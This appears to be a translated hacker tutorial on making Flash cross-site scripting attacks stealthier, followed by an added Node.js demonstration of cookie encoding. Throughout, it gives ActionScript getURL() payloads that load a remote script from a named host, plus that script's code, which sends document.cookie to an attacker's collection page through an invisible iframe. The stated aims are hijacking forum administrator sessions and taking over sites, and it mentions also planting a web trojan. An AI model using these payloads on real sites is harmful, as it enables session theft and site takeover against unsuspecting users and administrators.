Lately I have been busy learning Win32 assembly and too lazy to write articles. Flash cross-site attacks have been very popular recently, but when you carry one out, the IE window that pops up very easily arouses suspicion and makes the attack fail, which is a real headache. Have you been looking for a way to carry out a Flash cross-site attack without popping up an IE window, so that the attack stays hidden? Let's solve this problem together and make Flash cross-site attacks more perfect!
Generally, to carry out a Flash cross-site attack everyone makes a Flash animation and, in its first frame, uses the ActionScript getURL() function to jump to another URL, like this:
getURL("javascript:window.open('http://<address of the page that collects cookies>?'+document.cookie)", "_self")
The Flash animation is then placed in a forum signature, post or private message to obtain the cookies of administrators or users, gain administrative privileges, and from there take over the whole site. As you can see, this ActionScript is the most important part of the whole cross-site attack, and it is the window.open() in this script that opens the window we love and hate. So the only way to hide or get rid of the pop-up IE window is to change this script; there is no other way!
getURL("javascript:window.open('http://<address of the page that collects cookies>?'+document.cookie,'_search')", "_self")
Of course, this opens IE's search pane instead, which still arouses suspicion, although it does get past pop-up blockers! Let's think of something better.
If that were all I had to say, I believe many readers would want to ...
If you have read my article "Making a Perfect IE Trojan" and understood the code in it, you may already have thought of it!
That article contained the following code:
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(/\//g,'\\/');
window.open("javascript:document.all.tags('SCRIPT').src='"+jsurl+"';eval();","icyfoxlovelace");
Moved into the Flash animation, this becomes (the slashes are written as \/ so the URL survives forum filtering; inside a JavaScript string \/ is the same as /):
getURL("javascript:document.all.tags('SCRIPT').src='http:\/\/www.godog.y365.com\/wodemuma\/icyfox.js';eval();", "_self")
The contents of icyfox.js are as follows:
cookieurl="http://<address of the page that collects cookies>?cookie="+escape(document.cookie);
/* escape() encodes the cookie here, so that special characters in the cookie do not break the URL */
document.body.insertAdjacentHTML('BeforeEnd','<iframe width=0px height=0px style="display:none;" src="'+cookieurl+'"><\/iframe>');
/* insertAdjacentHTML() appends an invisible iframe at the end of the body; the iframe request carries the cookie to the collector */
That's it! The pop-up IE window problem of the Flash cross-site attack is solved! Of course, if you also want to put a web trojan into icyfox.js, I have nothing to say!
Finally, by the way, this trick for hiding the pop-up IE window can also be used in other kinds of cross-site scripting attacks! It is much more convenient than sending the cookie with the Microsoft.XMLHTTP control, because unlike XMLHTTP it is not restricted to sending to the current server. More importantly, Czy's article "Using the Microsoft.XMLHTTP control to send cookies" mentions the following:
"I once thought of a way of using the insertAdjacentHTML method to inject HTML statements into a web page. It can send the cookie without popping up an IE window, but in actual use IE errors are sometimes encountered."
By my analysis, this is because the cookie contains special characters that Czy did not process or encode properly, which is why IE errors were sometimes encountered in practice. That is why the code above uses escape() to encode the cookie; after receiving the cookie, remember to use unescape() to decode it!
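As an added example (this is not code from the original article or from icyfox.js), the following JavaScript, runnable in Node, shows what the encoding point above means in practice: a cookie string dropped into the collector URL unencoded is cut short at the first & and has its + signs turned into spaces by any ordinary query-string parser, the article's escape() fixes everything except +, and encodeURIComponent() round-trips the cookie intact. The collector address and the cookie string are constructed for the example.

```javascript
// Added example: why document.cookie has to be encoded before it is put into
// a collector URL, and what the receiving side gets back. The collector host
// and the sample cookie below are made up for this demonstration.

const COLLECTOR = "http://collector.example/get.php";

// A constructed cookie string with the characters that matter: '=' and ';'
// separate cookies, '&' and '+' are special in a query string.
const SAMPLE_COOKIE = "PHPSESSID=abc123; user=admin; sig=x+y&z=1";

// Build the collector URL with a chosen encoder (identity, escape, or
// encodeURIComponent). This mirrors the cookieurl line in icyfox.js.
function buildCollectorUrl(collector, cookie, encoder) {
  return collector + "?cookie=" + encoder(cookie);
}

// Receiver side: parse the query string the way a typical server-side
// framework does (split on '&', then '=', turn '+' into a space, percent-
// decode) and return the cookie parameter.
function readCookieParam(url) {
  const qs = url.slice(url.indexOf("?") + 1);
  const params = {};
  for (const pair of qs.split("&")) {
    const eq = pair.indexOf("=");
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const value = eq === -1 ? "" : pair.slice(eq + 1);
    params[decodeURIComponent(key)] = decodeURIComponent(value.replace(/\+/g, " "));
  }
  return params.cookie;
}

// Compare the three encoders: returns, for each, what the receiver sees and
// whether it equals the original cookie.
function compareEncoders(cookie) {
  const encoders = {
    none: (s) => s,
    escape: escape,                       // what the article uses
    encodeURIComponent: encodeURIComponent, // the modern, lossless choice
  };
  const out = {};
  for (const [name, enc] of Object.entries(encoders)) {
    const received = readCookieParam(buildCollectorUrl(COLLECTOR, cookie, enc));
    out[name] = { received, intact: received === cookie };
  }
  return out;
}

for (const [name, r] of Object.entries(compareEncoders(SAMPLE_COOKIE))) {
  console.log(name.padEnd(20), r.intact ? "intact  " : "damaged ", r.received);
}
```

The escape() result is the one to watch: escape() leaves + untouched and writes non-ASCII as %uXXXX, so the author's advice to decode with unescape() on the receiving side is what makes the pair work; a collector that instead relies on its framework's normal form decoding will still see + become a space. encodeURIComponent() avoids both problems. One further caveat for today's reader: document.cookie does not expose cookies set with the HttpOnly flag, so a session cookie marked HttpOnly never reaches any of these collector URLs in the first place.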